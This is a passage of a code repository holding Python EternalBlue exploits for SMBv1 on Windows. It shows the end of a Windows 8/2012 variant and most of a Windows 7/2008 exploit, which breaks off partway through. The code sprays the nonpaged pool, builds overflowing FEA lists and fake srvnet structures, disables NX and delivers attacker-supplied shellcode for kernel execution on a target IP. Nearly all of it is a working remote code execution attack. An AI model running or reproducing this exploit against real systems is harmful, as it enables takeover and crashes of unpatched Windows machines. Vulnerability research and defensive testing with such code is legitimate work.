265 | 	sessionSetup['Parameters'] = smb.SMBSessionSetupAndX_Extended_Parameters()
266 | 
267 | 	sessionSetup['Parameters']['MaxBufferSize']      = 61440  # can be any value greater than response size
268 | 	sessionSetup['Parameters']['MaxMpxCount']        = 2  # can by any value
269 | 	sessionSetup['Parameters']['VcNumber']           = 2  # any non-zero
270 | 	sessionSetup['Parameters']['SessionKey']         = 0
271 | 	sessionSetup['Parameters']['SecurityBlobLength'] = 0  # this is OEMPasswordLen field in another format. 0 for NULL session
272 | 	sessionSetup['Parameters']['Capabilities']       = smb.SMB.CAP_EXTENDED_SECURITY | smb.SMB.CAP_USE_NT_ERRORS
273 | 
274 | 	sessionSetup['Data'] = pack('<H', reqSize) + '\x00'*20
275 | 	pkt.addCommand(sessionSetup)
276 | 
277 | 	conn.sendSMB(pkt)
278 | 	recvPkt = conn.recvSMB()
279 | 	if recvPkt.getNTStatus() == 0:
280 | 		print('SMB1 session setup allocate nonpaged pool success')
281 | 		return conn
282 | 	
283 | 	if USERNAME:
284 | 		# Try login with valid user because anonymous user might get access denied on Windows Server 2012.
285 | 		# Note: If target allows only NTLMv2 authentication, the login will always fail.
286 | 		# support only ascii because I am lazy to implement Unicode (need pad for alignment and converting username to utf-16)
287 | 		flags2 &= ~smb.SMB.FLAGS2_UNICODE
288 | 		reqSize = size // 2
289 | 		conn.set_flags(flags2=flags2)
290 | 		
291 | 		# new SMB packet to reset flags
292 | 		pkt = smb.NewSMBPacket()
293 | 		pwd_unicode = conn.get_ntlmv1_response(ntlm.compute_nthash(PASSWORD))
294 | 		# UnicodePasswordLen field is in Reserved for extended security format.
295 | 		sessionSetup['Parameters']['Reserved'] = len(pwd_unicode)
296 | 		sessionSetup['Data'] = pack('<H', reqSize+len(pwd_unicode)+len(USERNAME)) + pwd_unicode + USERNAME + '\x00'*16
297 | 		pkt.addCommand(sessionSetup)
298 | 		
299 | 		conn.sendSMB(pkt)
300 | 		recvPkt = conn.recvSMB()
301 | 		if recvPkt.getNTStatus() == 0:
302 | 			print('SMB1 session setup allocate nonpaged pool success')
303 | 			return conn
304 | 
305 | 	# lazy to check error code, just print fail message
306 | 	print('SMB1 session setup allocate nonpaged pool failed')
307 | 	sys.exit(1)
308 | 
309 | 
310 | # Note: impacket-0.9.15 struct has no ParameterDisplacement
311 | ############# SMB_COM_TRANSACTION2_SECONDARY (0x33)
312 | class SMBTransaction2Secondary_Parameters_Fixed(smb.SMBCommand_Parameters):
313 |     structure = (
314 |         ('TotalParameterCount','<H=0'),
315 |         ('TotalDataCount','<H'),
316 |         ('ParameterCount','<H=0'),
317 |         ('ParameterOffset','<H=0'),
318 |         ('ParameterDisplacement','<H=0'),
319 |         ('DataCount','<H'),
320 |         ('DataOffset','<H'),
321 |         ('DataDisplacement','<H=0'),
322 |         ('FID','<H=0'),
323 |     )
324 | 
325 | def send_trans2_second(conn, tid, data, displacement):
326 | 	pkt = smb.NewSMBPacket()
327 | 	pkt['Tid'] = tid
328 | 
329 | 	# assume no params
330 | 
331 | 	transCommand = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2_SECONDARY)
332 | 	transCommand['Parameters'] = SMBTransaction2Secondary_Parameters_Fixed()
333 | 	transCommand['Data'] = smb.SMBTransaction2Secondary_Data()
334 | 
335 | 	transCommand['Parameters']['TotalParameterCount'] = 0
336 | 	transCommand['Parameters']['TotalDataCount'] = len(data)
337 | 
338 | 	fixedOffset = 32+3+18
339 | 	transCommand['Data']['Pad1'] = ''
340 | 
341 | 	transCommand['Parameters']['ParameterCount'] = 0
342 | 	transCommand['Parameters']['ParameterOffset'] = 0
343 | 
344 | 	if len(data) > 0:
345 | 		pad2Len = (4 - fixedOffset % 4) % 4
346 | 		transCommand['Data']['Pad2'] = '\xFF' * pad2Len
347 | 	else:
348 | 		transCommand['Data']['Pad2'] = ''
349 | 		pad2Len = 0
350 | 
351 | 	transCommand['Parameters']['DataCount'] = len(data)
352 | 	transCommand['Parameters']['DataOffset'] = fixedOffset + pad2Len
353 | 	transCommand['Parameters']['DataDisplacement'] = displacement
354 | 
355 | 	transCommand['Data']['Trans_Parameters'] = ''
356 | 	transCommand['Data']['Trans_Data'] = data
357 | 	pkt.addCommand(transCommand)
358 | 
359 | 	conn.sendSMB(pkt)
360 | 
361 | 
362 | def send_big_trans2(conn, tid, setup, data, param, firstDataFragmentSize, sendLastChunk=True):
363 | 	pkt = smb.NewSMBPacket()
364 | 	pkt['Tid'] = tid
365 | 
366 | 	command = pack('<H', setup)
367 | 
368 | 	# Use SMB_COM_NT_TRANSACT because we need to send data >65535 bytes to trigger the bug.
369 | 	transCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT)
370 | 	transCommand['Parameters'] = smb.SMBNTTransaction_Parameters()
371 | 	transCommand['Parameters']['MaxSetupCount'] = 1
372 | 	transCommand['Parameters']['MaxParameterCount'] = len(param)
373 | 	transCommand['Parameters']['MaxDataCount'] = 0
374 | 	transCommand['Data'] = smb.SMBTransaction2_Data()
375 | 
376 | 	transCommand['Parameters']['Setup'] = command
377 | 	transCommand['Parameters']['TotalParameterCount'] = len(param)
378 | 	transCommand['Parameters']['TotalDataCount'] = len(data)
379 | 
380 | 	fixedOffset = 32+3+38 + len(command)
381 | 	if len(param) > 0:
382 | 		padLen = (4 - fixedOffset % 4 ) % 4
383 | 		padBytes = '\xFF' * padLen
384 | 		transCommand['Data']['Pad1'] = padBytes
385 | 	else:
386 | 		transCommand['Data']['Pad1'] = ''
387 | 		padLen = 0
388 | 
389 | 	transCommand['Parameters']['ParameterCount'] = len(param)
390 | 	transCommand['Parameters']['ParameterOffset'] = fixedOffset + padLen
391 | 
392 | 	if len(data) > 0:
393 | 		pad2Len = (4 - (fixedOffset + padLen + len(param)) % 4) % 4
394 | 		transCommand['Data']['Pad2'] = '\xFF' * pad2Len
395 | 	else:
396 | 		transCommand['Data']['Pad2'] = ''
397 | 		pad2Len = 0
398 | 
399 | 	transCommand['Parameters']['DataCount'] = firstDataFragmentSize
400 | 	transCommand['Parameters']['DataOffset'] = transCommand['Parameters']['ParameterOffset'] + len(param) + pad2Len
401 | 
402 | 	transCommand['Data']['Trans_Parameters'] = param
403 | 	transCommand['Data']['Trans_Data'] = data[:firstDataFragmentSize]
404 | 	pkt.addCommand(transCommand)
405 | 
406 | 	conn.sendSMB(pkt)
407 | 	recvPkt = conn.recvSMB() # must be success
408 | 	if recvPkt.getNTStatus() == 0:
409 | 		print('got good NT Trans response')
410 | 	else:
411 | 		print('got bad NT Trans response: 0x{:x}'.format(recvPkt.getNTStatus()))
412 | 		sys.exit(1)
413 | 	
414 | 	# Then, use SMB_COM_TRANSACTION2_SECONDARY for send more data
415 | 	i = firstDataFragmentSize
416 | 	while i < len(data):
417 | 		sendSize = min(4096, len(data) - i)
418 | 		if len(data) - i <= 4096:
419 | 			if not sendLastChunk:
420 | 				break
421 | 		send_trans2_second(conn, tid, data[i:i+sendSize], i)
422 | 		i += sendSize
423 | 	
424 | 	if sendLastChunk:
425 | 		conn.recvSMB()
426 | 	return i
427 | 
428 | 	
429 | # connect to target and send a large nbss size with data 0x80 bytes
430 | # this method is for allocating big nonpaged pool on target
431 | def createConnectionWithBigSMBFirst80(target, for_nx=False):
432 | 	sk = socket.create_connection((target, 445))
433 | 	pkt = '\x00' + '\x00' + pack('>H', 0x8100)
434 | 	# There is no need to be SMB2 because we want the target free the corrupted buffer.
435 | 	# Also this is invalid SMB2 message.
436 | 	# I believe NSA exploit use SMB2 for hiding alert from IDS
437 | 	#pkt += '\xfeSMB' # smb2
438 | 	# it can be anything even it is invalid
439 | 	pkt += 'BAAD' # can be any
440 | 	if for_nx:
441 | 		# MUST set no delay because 1 byte MUST be sent immediately
442 | 		sk.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
443 | 		pkt += '\x00'*0x7b  # another byte will be sent later to disabling NX
444 | 	else:
445 | 		pkt += '\x00'*0x7c
446 | 	sk.send(pkt)
447 | 	return sk
448 | 
449 | 
450 | def exploit(target, shellcode, numGroomConn):
451 | 	# force using smb.SMB for SMB1
452 | 	conn = smb.SMB(target, target)
453 | 	conn.login(USERNAME, PASSWORD)
454 | 	server_os = conn.get_server_os()
455 | 	print('Target OS: '+server_os)
456 | 	if not (server_os.startswith("Windows 8") or server_os.startswith("Windows Server 2012 ")):
457 | 		print('This exploit does not support this target')
458 | 		sys.exit()
459 | 
460 | 	tid = conn.tree_connect_andx('\\\\'+target+'\\'+'IPC$')
461 | 
462 | 	# The minimum requirement to trigger bug in SrvOs2FeaListSizeToNt() is SrvSmbOpen2() which is TRANS2_OPEN2 subcommand.
463 | 	# Send TRANS2_OPEN2 (0) with special feaList to a target except last fragment
464 | 	progress = send_big_trans2(conn, tid, 0, feaList, '\x00'*30, len(feaList)%4096, False)
465 | 
466 | 	# Another TRANS2_OPEN2 (0) with special feaList for disabling NX
467 | 	nxconn = smb.SMB(target, target)
468 | 	nxconn.login(USERNAME, PASSWORD)
469 | 	nxtid = nxconn.tree_connect_andx('\\\\'+target+'\\'+'IPC$')
470 | 	nxprogress = send_big_trans2(nxconn, nxtid, 0, feaListNx, '\x00'*30, len(feaList)%4096, False)
471 | 
472 | 	# create some big buffer at server
473 | 	# this buffer MUST NOT be big enough for overflown buffer
474 | 	allocConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x2010)
475 | 	
476 | 	# groom nonpaged pool
477 | 	# when many big nonpaged pool are allocated, allocate another big nonpaged pool should be next to the last one
478 | 	srvnetConn = []
479 | 	for i in range(numGroomConn):
480 | 		sk = createConnectionWithBigSMBFirst80(target, for_nx=True)
481 | 		srvnetConn.append(sk)
482 | 
483 | 	# create buffer size NTFEA_SIZE at server
484 | 	# this buffer will be replaced by overflown buffer
485 | 	holeConn = createSessionAllocNonPaged(target, NTFEA_SIZE-0x10)
486 | 	# disconnect allocConn to free buffer
487 | 	# expect small nonpaged pool allocation is not allocated next to holeConn because of this free buffer
488 | 	allocConn.get_socket().close()
489 | 
490 | 	# hope one of srvnetConn is next to holeConn
491 | 	for i in range(5):
492 | 		sk = createConnectionWithBigSMBFirst80(target, for_nx=True)
493 | 		srvnetConn.append(sk)
494 | 	
495 | 	# remove holeConn to create hole for fea buffer
496 | 	holeConn.get_socket().close()
497 | 	
498 | 	# send last fragment to create buffer in hole and OOB write one of srvnetConn struct header
499 | 	# first trigger, overwrite srvnet buffer struct for disabling NX
500 | 	send_trans2_second(nxconn, nxtid, feaListNx[nxprogress:], nxprogress)
501 | 	recvPkt = nxconn.recvSMB()
502 | 	retStatus = recvPkt.getNTStatus()
503 | 	if retStatus == 0xc000000d:
504 | 		print('good response status for nx: INVALID_PARAMETER')
505 | 	else:
506 | 		print('bad response status for nx: 0x{:08x}'.format(retStatus))
507 | 		
508 | 	# one of srvnetConn struct header should be modified
509 | 	# send '\x00' to disable nx
510 | 	for sk in srvnetConn:
511 | 		sk.send('\x00')
512 | 	
513 | 	# send last fragment to create buffer in hole and OOB write one of srvnetConn struct header
514 | 	# second trigger, place fake struct and shellcode
515 | 	send_trans2_second(conn, tid, feaList[progress:], progress)
516 | 	recvPkt = conn.recvSMB()
517 | 	retStatus = recvPkt.getNTStatus()
518 | 	if retStatus == 0xc000000d:
519 | 		print('good response status: INVALID_PARAMETER')
520 | 	else:
521 | 		print('bad response status: 0x{:08x}'.format(retStatus))
522 | 
523 | 	# one of srvnetConn struct header should be modified
524 | 	# a corrupted buffer will write recv data in designed memory address
525 | 	for sk in srvnetConn:
526 | 		sk.send(fake_recv_struct + shellcode)
527 | 
528 | 	# execute shellcode
529 | 	for sk in srvnetConn:
530 | 		sk.close()
531 | 	
532 | 	# nicely close connection (no need for exploit)
533 | 	nxconn.disconnect_tree(tid)
534 | 	nxconn.logoff()
535 | 	nxconn.get_socket().close()
536 | 	conn.disconnect_tree(tid)
537 | 	conn.logoff()
538 | 	conn.get_socket().close()
539 | 
540 | 
541 | if len(sys.argv) < 3:
542 | 	print("{} <ip> <shellcode_file> [numGroomConn]".format(sys.argv[0]))
543 | 	sys.exit(1)
544 | 
545 | TARGET=sys.argv[1]
546 | numGroomConn = 13 if len(sys.argv) < 4 else int(sys.argv[3])
547 | 
548 | fp = open(sys.argv[2], 'rb')
549 | sc = fp.read()
550 | fp.close()
551 | 
552 | if len(sc) > 0xe80:
553 | 	print('Shellcode too long. The place that this exploit put a shellcode is limited to {} bytes.'.format(0xe80))
554 | 	sys.exit()
555 | 
556 | # Now, shellcode is known. create a feaList
557 | feaList = createFeaList(len(sc))
558 | 
559 | print('shellcode size: {:d}'.format(len(sc)))
560 | print('numGroomConn: {:d}'.format(numGroomConn))
561 | 
562 | exploit(TARGET, sc, numGroomConn)
563 | print('done')
564 | 


--------------------------------------------------------------------------------
/eternalblue_exploit7.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python
  2 | from impacket import smb
  3 | from struct import pack
  4 | import sys
  5 | import socket
  6 | 
  7 | '''
  8 | EternalBlue exploit for Windows 7/2008 by sleepya
  9 | The exploit might FAIL and CRASH a target system (depended on what is overwritten)
 10 | 
 11 | Tested on:
 12 | - Windows 7 SP1 x64
 13 | - Windows 2008 R2 SP1 x64
 14 | - Windows 7 SP1 x86
 15 | - Windows 2008 SP1 x86
 16 | 
 17 | Reference:
 18 | - http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/
 19 | 
 20 | 
 21 | Bug detail:
 22 | - For the buffer overflow bug detail, please see http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/
 23 | - The exploit also use other 2 bugs (see details in BUG.txt)
 24 |   - Send a large transaction with SMB_COM_NT_TRANSACT but processed as SMB_COM_TRANSACTION2 (requires for trigger bug)
 25 |   - Send special session setup command (SMB login command) to allocate big nonpaged pool (use for creating hole)
 26 | ######
 27 | 
 28 | 
 29 | Exploit info:
 30 | - I do not reverse engineer any x86 binary so I do not know about exact offset.
 31 | - The exploit use heap of HAL (address 0xffffffffffd00010 on x64) for placing fake struct and shellcode.
 32 |   This memory page is executable on Windows 7 and Wndows 2008.
 33 | - The important part of feaList and fakeStruct is copied from NSA exploit which works on both x86 and x64.
 34 | - The exploit trick is same as NSA exploit
 35 | - The overflow is happened on nonpaged pool so we need to massage target nonpaged pool.
 36 | - If exploit failed but target does not crash, try increasing 'numGroomConn' value (at least 5)
 37 | - See the code and comment for exploit detail.
 38 | 
 39 | 
 40 | srvnet buffer info:
 41 | - srvnet buffer contains a pointer to another struct and MDL about received buffer
 42 |   - Controlling MDL values results in arbitrary write
 43 |   - Controlling pointer to fake struct results in code execution because there is pointer to function
 44 | - A srvnet buffer is created after target receiving first 4 bytes
 45 |   - First 4 bytes contains length of SMB message
 46 |   - The possible srvnet buffer size is "..., 0x9000, 0x11000, 0x21000, ...". srvnet.sys will select the size that big enough.
 47 | - After receiving whole SMB message or connection lost, server call SrvNetWskReceiveComplete() to handle SMB message
 48 | - SrvNetWskReceiveComplete() check and set some value then pass SMB message to SrvNetCommonReceiveHandler()
 49 | - SrvNetCommonReceiveHandler() passes SMB message to SMB handler
 50 |   - If a pointer in srvnet buffer is modified to fake struct, we can make SrvNetCommonReceiveHandler() call our shellcode
 51 |   - If SrvNetCommonReceiveHandler() call our shellcode, no SMB handler is called
 52 |   - Normally, SMB handler free the srvnet buffer when done but our shellcode dose not. So memory leak happen.
 53 |   - Memory leak is ok to be ignored
 54 | 
 55 | 
 56 | Shellcode note:
 57 | - Shellcode is executed in kernel mode (ring 0) and IRQL is DISPATCH_LEVEL
 58 | - Hijacking system call is common method for getting code execution in Process context (IRQL is PASSIVE_LEVEL)
 59 |   - On Windows x64, System call target address can be modified by writing to IA32_LSTAR MSR (0xc0000082)
 60 |   - IA32_LSTAR MSR scope is core/thread/unique depended on CPU model
 61 |   - On idle target with multiple core processors, the hijacked system call might take a while (> 5 minutes) to 
 62 |       get call because it is called on other processors
 63 |   - Shellcode should be aware of double overwriting system call target address when using hijacking system call method
 64 | - Then, using APC in Process context to get code execution in userland (ring 3)
 65 | '''
 66 | 
 67 | # Note: see how to craft FEALIST in eternalblue_poc.py
 68 | 
 69 | # wanted overflown buffer size (this exploit support only 0x10000 and 0x11000)
 70 | # the size 0x10000 is easier to debug when setting breakpoint in SrvOs2FeaToNt() because it is called only 2 time
 71 | # the size 0x11000 is used in nsa exploit. this size is more reliable.
 72 | NTFEA_SIZE = 0x11000
 73 | # the NTFEA_SIZE above is page size. We need to use most of last page preventing any data at the end of last page
 74 | 
 75 | ntfea10000 = pack('<BBH', 0, 0, 0xffdd) + 'A'*0xffde
 76 | 
 77 | ntfea11000 = (pack('<BBH', 0, 0, 0) + '\x00')*600  # with these fea, ntfea size is 0x1c20
 78 | ntfea11000 += pack('<BBH', 0, 0, 0xf3bd) + 'A'*0xf3be  # 0x10fe8 - 0x1c20 - 0xc = 0xf3bc
 79 | 
 80 | ntfea1f000 = (pack('<BBH', 0, 0, 0) + '\x00')*0x2494  # with these fea, ntfea size is 0x1b6f0
 81 | ntfea1f000 += pack('<BBH', 0, 0, 0x48ed) + 'A'*0x48ee  # 0x1ffe8 - 0x1b6f0 - 0xc = 0x48ec
 82 | 
 83 | ntfea = { 0x10000 : ntfea10000, 0x11000 : ntfea11000 }
 84 | 
 85 | '''
 86 | Reverse from srvnet.sys (Win7 x64)
 87 | - SrvNetAllocateNonPagedBufferInternal() and SrvNetWskReceiveComplete():
 88 | 
 89 | // for x64
 90 | struct SRVNET_BUFFER {
 91 | 	// offset from POOLHDR: 0x10
 92 | 	USHORT flag;
 93 | 	char pad[2];
 94 | 	char unknown0[12];
 95 | 	// offset from SRVNET_POOLHDR: 0x20
 96 | 	LIST_ENTRY list;
 97 | 	// offset from SRVNET_POOLHDR: 0x30
 98 | 	char *pnetBuffer;
 99 | 	DWORD netbufSize;  // size of netBuffer
100 | 	DWORD ioStatusInfo;  // copy value of IRP.IOStatus.Information
101 | 	// offset from SRVNET_POOLHDR: 0x40
102 | 	MDL *pMdl1; // at offset 0x70
103 | 	DWORD nByteProcessed;
104 | 	DWORD pad3;
105 | 	// offset from SRVNET_POOLHDR: 0x50
106 | 	DWORD nbssSize;  // size of this smb packet (from user)
107 | 	DWORD pad4;
108 | 	QWORD pSrvNetWskStruct;  // want to change to fake struct address
109 | 	// offset from SRVNET_POOLHDR: 0x60
110 | 	MDL *pMdl2;
111 | 	QWORD unknown5;
112 | 	// offset from SRVNET_POOLHDR: 0x70
113 | 	// MDL mdl1;  // for this srvnetBuffer (so its pointer is srvnetBuffer address)
114 | 	// MDL mdl2;
115 | 	// char transportHeader[0x50];  // 0x50 is TRANSPORT_HEADER_SIZE
116 | 	// char netBuffer[0];
117 | };
118 | 
119 | struct SRVNET_POOLHDR {
120 | 	DWORD size;
121 | 	char unknown[12];
122 | 	SRVNET_BUFFER hdr;
123 | };
124 | '''
125 | # Most field in overwritten (corrupted) srvnet struct can be any value because it will be left without free (memory leak) after processing
126 | # Here is the important fields on x64
127 | # - offset 0x58 (VOID*) : pointer to a struct contained pointer to function. the pointer to function is called when done receiving SMB request.
128 | #                           The value MUST point to valid (might be fake) struct.
129 | # - offset 0x70 (MDL)   : MDL for describe receiving SMB request buffer
130 | #   - 0x70 (VOID*)    : MDL.Next should be NULL
131 | #   - 0x78 (USHORT)   : MDL.Size should be some value that not too small
132 | #   - 0x7a (USHORT)   : MDL.MdlFlags should be 0x1004 (MDL_NETWORK_HEADER|MDL_SOURCE_IS_NONPAGED_POOL)
133 | #   - 0x80 (VOID*)    : MDL.Process should be NULL
134 | #   - 0x88 (VOID*)    : MDL.MappedSystemVa MUST be a received network buffer address. Controlling this value get arbitrary write.
135 | #                         The address for arbitrary write MUST be subtracted by a number of sent bytes (0x80 in this exploit).
136 | #                         
137 | #
138 | # To free the corrupted srvnet buffer, shellcode MUST modify some memory value to satisfy condition.
139 | # Here is related field for freeing corrupted buffer
140 | # - offset 0x10 (USHORT): be 0xffff to make SrvNetFreeBuffer() really free the buffer (else buffer is pushed to srvnet lookaside)
141 | #                           a corrupted buffer MUST not be reused.
142 | # - offset 0x48 (DWORD) : be a number of total byte received. This field MUST be set by shellcode because SrvNetWskReceiveComplete() set it to 0
143 | #                           before calling SrvNetCommonReceiveHandler(). This is possible because pointer to SRVNET_BUFFER struct is passed to
144 | #                           your shellcode as function argument
145 | # - offset 0x60 (PMDL)  : points to any fake MDL with MDL.Flags 0x20 does not set
146 | # The last condition is your shellcode MUST return non-negative value. The easiest way to do is "xor eax,eax" before "ret".
147 | # Here is x64 assembly code for setting nByteProcessed field
148 | # - fetch SRVNET_BUFFER address from function argument
149 | #     \x48\x8b\x54\x24\x40  mov rdx, [rsp+0x40]
150 | # - set nByteProcessed for trigger free after return
151 | #     \x8b\x4a\x2c          mov ecx, [rdx+0x2c]
152 | #     \x89\x4a\x38          mov [rdx+0x38], ecx
153 | 
154 | TARGET_HAL_HEAP_ADDR_x64 = 0xffffffffffd00010
155 | TARGET_HAL_HEAP_ADDR_x86 = 0xffdff000
156 | 
157 | fakeSrvNetBufferNsa = pack('<II', 0x11000, 0)*2
158 | fakeSrvNetBufferNsa += pack('<HHI', 0xffff, 0, 0)*2
159 | fakeSrvNetBufferNsa += '\x00'*16
160 | fakeSrvNetBufferNsa += pack('<IIII', TARGET_HAL_HEAP_ADDR_x86+0x100, 0, 0, TARGET_HAL_HEAP_ADDR_x86+0x20)
161 | fakeSrvNetBufferNsa += pack('<IIHHI', TARGET_HAL_HEAP_ADDR_x86+0x100, 0, 0x60, 0x1004, 0)  # _, x86 MDL.Next, .Size, .MdlFlags, .Process
162 | fakeSrvNetBufferNsa += pack('<IIQ', TARGET_HAL_HEAP_ADDR_x86-0x80, 0, TARGET_HAL_HEAP_ADDR_x64)  # x86 MDL.MappedSystemVa, _, x64 pointer to fake struct
163 | fakeSrvNetBufferNsa += pack('<QQ', TARGET_HAL_HEAP_ADDR_x64+0x100, 0)  # x64 pmdl2
164 | # below 0x20 bytes is overwritting MDL
165 | # NSA exploit overwrite StartVa, ByteCount, ByteOffset fields but I think no need because ByteCount is always big enough
166 | fakeSrvNetBufferNsa += pack('<QHHI', 0, 0x60, 0x1004, 0)  # MDL.Next, MDL.Size, MDL.MdlFlags
167 | fakeSrvNetBufferNsa += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64-0x80)  # MDL.Process, MDL.MappedSystemVa
168 | 
169 | # below is for targeting x64 only (all x86 related values are set to 0)
170 | # this is for show what fields need to be modified
171 | fakeSrvNetBufferX64 = pack('<II', 0x11000, 0)*2
172 | fakeSrvNetBufferX64 += pack('<HHIQ', 0xffff, 0, 0, 0)
173 | fakeSrvNetBufferX64 += '\x00'*16
174 | fakeSrvNetBufferX64 += '\x00'*16
175 | fakeSrvNetBufferX64 += '\x00'*16  # 0x40
176 | fakeSrvNetBufferX64 += pack('<IIQ', 0, 0, TARGET_HAL_HEAP_ADDR_x64)  # _, _, pointer to fake struct
177 | fakeSrvNetBufferX64 += pack('<QQ', TARGET_HAL_HEAP_ADDR_x64+0x100, 0)  # pmdl2
178 | fakeSrvNetBufferX64 += pack('<QHHI', 0, 0x60, 0x1004, 0)  # MDL.Next, MDL.Size, MDL.MdlFlags
179 | fakeSrvNetBufferX64 += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64-0x80)  # MDL.Process, MDL.MappedSystemVa
180 | 
181 | 
182 | fakeSrvNetBuffer = fakeSrvNetBufferNsa
183 | #fakeSrvNetBuffer = fakeSrvNetBufferX64
184 | 
185 | feaList = pack('<I', 0x10000)  # the value of feaList size MUST be >=0x10000 to trigger bug (but must be less than data size)
186 | feaList += ntfea[NTFEA_SIZE]
187 | # Note:
188 | # - SMB1 data buffer header is 16 bytes and 8 bytes on x64 and x86 respectively
189 | #   - x64: below fea will be copy to offset 0x11000 of overflow buffer
190 | #   - x86: below fea will be copy to offset 0x10ff8 of overflow buffer
191 | feaList += pack('<BBH', 0, 0, len(fakeSrvNetBuffer)-1) + fakeSrvNetBuffer # -1 because first '\x00' is for name
192 | # stop copying by invalid flag (can be any value except 0 and 0x80)
193 | feaList += pack('<BBH', 0x12, 0x34, 0x5678)
194 | 
195 | 
196 | # fake struct for SrvNetWskReceiveComplete() and SrvNetCommonReceiveHandler()
197 | # x64: fake struct is at ffffffff ffd00010
198 | #   offset 0xa0:  LIST_ENTRY must be valid address. cannot be NULL.
199 | #   offset 0x08:  set to 3 (DWORD) for invoking ptr to function
200 | #   offset 0x1d0: KSPIN_LOCK
201 | #   offset 0x1d8: array of pointer to function
202 | #
203 | # code path to get code exection after this struct is controlled
204 | # SrvNetWskReceiveComplete() -> SrvNetCommonReceiveHandler() -> call fn_ptr
205 | fake_recv_struct = pack('<QII', 0, 3, 0)
206 | fake_recv_struct += '\x00'*16
207 | fake_recv_struct += pack('<QII', 0, 3, 0)
208 | fake_recv_struct += ('\x00'*16)*7
209 | fake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR_x64+0xa0, TARGET_HAL_HEAP_ADDR_x64+0xa0)  # offset 0xa0 (LIST_ENTRY to itself)
210 | fake_recv_struct += '\x00'*16
211 | fake_recv_struct += pack('<IIQ', TARGET_HAL_HEAP_ADDR_x86+0xc0, TARGET_HAL_HEAP_ADDR_x86+0xc0, 0)  # x86 LIST_ENTRY
212 | fake_recv_struct += ('\x00'*16)*11
213 | fake_recv_struct += pack('<QII', 0, 0, TARGET_HAL_HEAP_ADDR_x86+0x190)  # fn_ptr array on x86
214 | fake_recv_struct += pack('<IIQ', 0, TARGET_HAL_HEAP_ADDR_x86+0x1f0-1, 0)  # x86 shellcode address
215 | fake_recv_struct += ('\x00'*16)*3
216 | fake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64+0x1e0)  # offset 0x1d0: KSPINLOCK, fn_ptr array
217 | fake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64+0x1f0-1)  # x64 shellcode address - 1 (this value will be increment by one)
218 | 
219 | 
220 | def getNTStatus(self):
221 | 	return (self['ErrorCode'] << 16) | (self['_reserved'] << 8) | self['ErrorClass']
222 | setattr(smb.NewSMBPacket, "getNTStatus", getNTStatus)
223 | 
224 | def sendEcho(conn, tid, data):
225 | 	pkt = smb.NewSMBPacket()
226 | 	pkt['Tid'] = tid
227 | 
228 | 	transCommand = smb.SMBCommand(smb.SMB.SMB_COM_ECHO)
229 | 	transCommand['Parameters'] = smb.SMBEcho_Parameters()
230 | 	transCommand['Data'] = smb.SMBEcho_Data()
231 | 
232 | 	transCommand['Parameters']['EchoCount'] = 1
233 | 	transCommand['Data']['Data'] = data
234 | 	pkt.addCommand(transCommand)
235 | 
236 | 	conn.sendSMB(pkt)
237 | 	recvPkt = conn.recvSMB()
238 | 	if recvPkt.getNTStatus() == 0:
239 | 		print('got good ECHO response')
240 | 	else:
241 | 		print('got bad ECHO response: 0x{:x}'.format(recvPkt.getNTStatus()))
242 | 
243 | 
244 | def createSessionAllocNonPaged(target, size):
245 | 	# There is a bug in SMB_COM_SESSION_SETUP_ANDX command that allow us to allocate a big nonpaged pool.
246 | 	# The big nonpaged pool allocation is in BlockingSessionSetupAndX() function for storing NativeOS and NativeLanMan.
247 | 	# The NativeOS and NativeLanMan size is caculated from "ByteCount - other_data_size"
248 | 	
249 | 	# Normally a server validate WordCount and ByteCount field in SrvValidateSmb() function. They must not be larger than received data. 
250 | 	# For "NT LM 0.12" dialect, There are 2 possible packet format for SMB_COM_SESSION_SETUP_ANDX command.
251 | 	# - https://msdn.microsoft.com/en-us/library/ee441849.aspx for LM and NTLM authentication
252 | 	#   - GetNtSecurityParameters() function is resposible for extracting data from this packet format
253 | 	# - https://msdn.microsoft.com/en-us/library/cc246328.aspx for NTLMv2 (NTLM SSP) authentication
254 | 	#   - GetExtendSecurityParameters() function is resposible for extracting data from this packet format
255 | 	
256 | 	# These 2 formats have different WordCount (first one is 13 and later is 12). 
257 | 	# Here is logic in BlockingSessionSetupAndX() related to this bug
258 | 	# - check WordCount for both formats (the CAP_EXTENDED_SECURITY must be set for extended security format)
259 | 	# - if FLAGS2_EXTENDED_SECURITY and CAP_EXTENDED_SECURITY are set, process a message as Extend Security request
260 | 	# - else, process a message as NT Security request
261 | 	
262 | 	# So we can send one format but server processes it as another format by controlling FLAGS2_EXTENDED_SECURITY and CAP_EXTENDED_SECURITY.
263 | 	# With this confusion, server read a ByteCount from wrong offset to calculating "NativeOS and NativeLanMan size".
264 | 	# But GetExtendSecurityParameters() checks ByteCount value again.
265 | 	
266 | 	# So the only possible request to use the bug is sending Extended Security request but does not set FLAGS2_EXTENDED_SECURITY.
267 | 	
268 | 	conn = smb.SMB(target, target)
269 | 	_, flags2 = conn.get_flags()
270 | 	# FLAGS2_EXTENDED_SECURITY MUST not be set
271 | 	flags2 &= ~smb.SMB.FLAGS2_EXTENDED_SECURITY
272 | 	# if not use unicode, buffer size on target machine is doubled because converting ascii to utf16
273 | 	if size >= 0xffff:
274 | 		flags2 &= ~smb.SMB.FLAGS2_UNICODE
275 | 		reqSize = size // 2
276 | 	else:
277 | 		flags2 |= smb.SMB.FLAGS2_UNICODE
278 | 		reqSize = size
279 | 	conn.set_flags(flags2=flags2)
280 | 	
281 | 	pkt = smb.NewSMBPacket()
282 | 
283 | 	sessionSetup = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)
284 | 	sessionSetup['Parameters'] = smb.SMBSessionSetupAndX_Extended_Parameters()
285 | 
286 | 	sessionSetup['Parameters']['MaxBufferSize']      = 61440  # can be any value greater than response size
287 | 	sessionSetup['Parameters']['MaxMpxCount']        = 2  # can by any value
288 | 	sessionSetup['Parameters']['VcNumber']           = 2  # any non-zero
